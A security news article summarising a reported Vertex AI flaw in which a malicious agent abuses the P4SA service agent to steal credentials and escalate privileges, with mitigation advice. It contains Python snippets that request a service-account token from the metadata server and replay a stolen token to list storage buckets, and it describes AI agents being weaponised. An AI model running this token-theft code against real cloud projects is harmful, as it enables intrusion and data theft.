Vertex AI Vulnerability Exposed: How "Double Agents" Can Weaponize Google Cloud AI for Data Theft

By Imthiyaz Ali

A newly disclosed vulnerability in Google Cloud’s Vertex AI platform has raised serious concerns about the security of AI-driven cloud environments. Researchers from Palo Alto Networks Unit 42 uncovered a flaw in the permission model that could allow attackers to weaponize AI agents, extract sensitive data, and potentially compromise entire cloud projects.

Understanding the Vertex AI Security Flaw

Vertex AI, Google Cloud’s flagship machine learning platform, enables organizations to build, deploy, and scale AI models efficiently. However, the vulnerability lies in how service agents, specifically the Per-Project, Per-Product Service Agent (P4SA), interact with AI agents deployed on the platform.

According to Unit 42, attackers could exploit this interaction by leveraging the default permissions granted to these service agents. Once an AI agent is deployed using Vertex AI’s Agent Engine, it may gain access to sensitive resources beyond its intended scope.

How the Attack Works

The attack chain involves multiple stages, primarily focusing on abusing metadata services and privilege escalation mechanisms:

  1. Deployment Abuse: Attackers deploy a malicious AI agent within a target project.
  2. Metadata Exploitation: The agent accesses the metadata service to retrieve service account credentials.
  3. Credential Extraction: Tokens associated with the P4SA are extracted.
  4. Privilege Escalation: Using these credentials, attackers gain elevated permissions.
  5. Data Exfiltration: Sensitive data and private artifacts are accessed and extracted.
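
The metadata-exploitation and credential-extraction steps above rely on the instance metadata service. As an illustration only, a minimal Python sketch of how an agent's code could request a token from the standard GCE metadata endpoint (the function names here are hypothetical, and whether a given Agent Engine deployment can reach this endpoint depends on its configuration):

```python
import json
import urllib.request

# Standard GCE metadata-server endpoint for the attached service account's
# short-lived OAuth2 access token.
METADATA_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)


def build_token_request() -> urllib.request.Request:
    """Build the metadata request; the Metadata-Flavor header is mandatory."""
    return urllib.request.Request(
        METADATA_URL, headers={"Metadata-Flavor": "Google"}
    )


def fetch_access_token(timeout: float = 2.0) -> str:
    """Return the access token for the default service account, if reachable."""
    req = build_token_request()
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read())["access_token"]
```

This is also why restricting metadata-service access (see the mitigations later in this article) is effective: blocking this one endpoint breaks the chain between deployment abuse and credential extraction.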

Why This Vulnerability Is Critical

The impact of this vulnerability is particularly severe due to the central role Vertex AI plays in enterprise AI workflows. Organizations often store proprietary models, datasets, and business logic within these environments.

  • Over 60% of enterprises now use cloud-based AI services in production environments.
  • AI workloads often include sensitive training data, including customer and operational information.
  • Misconfigured IAM roles are responsible for nearly 45% of cloud security incidents.

By exploiting this flaw, attackers could move laterally across cloud environments, access Google-owned resources in certain contexts, and compromise multiple services within a project.

The Role of P4SA in the Exploit

The Per-Project, Per-Product Service Agent (P4SA) is designed to manage interactions between Google Cloud services and user resources. However, its broad permissions can become a liability when improperly scoped.

In this case, attackers can leverage the P4SA to:

  • Access restricted APIs
  • Interact with storage buckets
  • Retrieve sensitive artifacts
  • Execute actions on behalf of the project
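
To illustrate the storage-bucket interaction, a stolen bearer token could be replayed against the Cloud Storage JSON API to enumerate buckets in a project. The helper below only constructs the request and is a hypothetical sketch, not a reproduction of the Unit 42 exploit:

```python
import urllib.request


def build_bucket_list_request(project_id: str, token: str) -> urllib.request.Request:
    """Build a GCS JSON API request listing every bucket the token can see.

    With an over-privileged P4SA token, follow-up object-level calls could
    then retrieve sensitive artifacts stored in those buckets.
    """
    url = f"https://storage.googleapis.com/storage/v1/b?project={project_id}"
    return urllib.request.Request(
        url, headers={"Authorization": f"Bearer {token}"}
    )
```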

Potential Business Impact

The implications of this vulnerability extend beyond technical risks. Organizations relying on Vertex AI could face:

  • Data breaches involving proprietary AI models
  • Intellectual property theft
  • Regulatory compliance violations (GDPR, HIPAA, etc.)
  • Financial losses due to incident response and downtime

For enterprises with multi-tenant AI environments, the risk becomes even more pronounced, as attackers may pivot across projects and services.

Mitigation and Security Recommendations

To reduce exposure to such vulnerabilities, security teams should adopt the following best practices:

  • Apply the principle of least privilege to service accounts
  • Restrict access to the metadata service
  • Monitor and audit service agent activities
  • Implement network segmentation for AI workloads
  • Use identity-aware proxies and secure authentication mechanisms
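
The least-privilege recommendation can be partially automated. Below is a minimal sketch that scans an IAM policy document (in the JSON shape returned by `gcloud projects get-iam-policy --format=json`) for service accounts holding basic or admin roles; the function name and the role heuristics are illustrative, not an exhaustive audit:

```python
# Basic roles that are almost always too broad for a service account.
BROAD_ROLES = {"roles/owner", "roles/editor"}


def find_risky_bindings(policy: dict) -> list[tuple[str, str]]:
    """Return (member, role) pairs where a service account holds a broad role."""
    risky = []
    for binding in policy.get("bindings", []):
        role = binding["role"]
        too_broad = role in BROAD_ROLES or role.lower().endswith("admin")
        if not too_broad:
            continue
        for member in binding.get("members", []):
            if member.startswith("serviceAccount:"):
                risky.append((member, role))
    return risky
```

Running a check like this on every project, and alerting on new matches, turns the least-privilege principle into a continuous control rather than a one-time review.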

Additionally, organizations should continuously review IAM configurations and leverage security tools that provide visibility into cloud permissions and anomalies.

The Bigger Picture: AI Security Risks Are Growing

This discovery highlights a broader trend: as AI platforms become more integrated into cloud ecosystems, their attack surface expands significantly. AI agents, while powerful, can also become entry points for sophisticated attacks if not properly secured.

The convergence of AI and cloud computing demands a new approach to cybersecurity—one that accounts for autonomous agents, dynamic permissions, and complex service interactions.

NeuraCyb's Assessment

The Vertex AI vulnerability serves as a critical reminder that even advanced cloud platforms are not immune to security flaws. By exploiting service agent permissions and metadata access, attackers can gain a foothold in cloud environments and execute high-impact attacks.

As organizations continue to adopt AI at scale, securing these environments must become a top priority. Proactive monitoring, strict IAM controls, and continuous security assessments are essential to safeguarding sensitive data and maintaining trust in cloud-based AI systems.

Imthiyaz Ali
Imthiyaz Ali is a cybersecurity professional with over 5 years of experience in cybersecurity research.